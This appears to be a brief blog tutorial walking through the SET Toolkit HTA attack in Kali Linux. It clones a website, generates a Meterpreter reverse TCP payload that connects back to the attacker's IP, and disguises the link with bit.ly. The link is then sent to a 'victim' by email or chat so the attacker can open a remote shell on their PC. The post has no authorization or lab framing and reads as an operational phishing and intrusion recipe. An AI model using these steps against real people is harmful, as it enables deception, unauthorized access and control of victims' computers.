The
HTA Attack method will allow you to clone a site and perform powershell
injection through HTA files which can be used for Windows-based powershell
exploitation through the browser.
First open your kali Linux application tab in Post Exploitation chose SET Toolkit
Now choose option 1, “Social – Engineering Attacks”
Now choose option 2, “Website Attack Vectors”
Now choose option 8,
“HTA Attack Method”
Enter the IP address to connect back on: 192.168.0.125 (IP address of Your PC)
Now select the payload I choose 1 Meterpreter reverse TCP.
Now we will choose option 2, “Site Cloner and
type the site name you want to be clone. Nad starting MSF listener
automatically
Now you will get index.html
and launcher.hta in /var/www directory.
Now move both file to var/www/html directory.
Now
convert your URL into Bitly URL using bit.ly and send this link
address to your victim via Email or Chat
When Victim Machine browsing to bitly URL it will ask you for Prompt to keep/Discard
Now
you will get the meterpreter of victim PC. Now type sessions –l to display
sessions opened when the victim opens the link
Now
the session has opened type sysinfo to
get system information, then type shell to
enter into Victims command prompt.
0 comments:
Post a Comment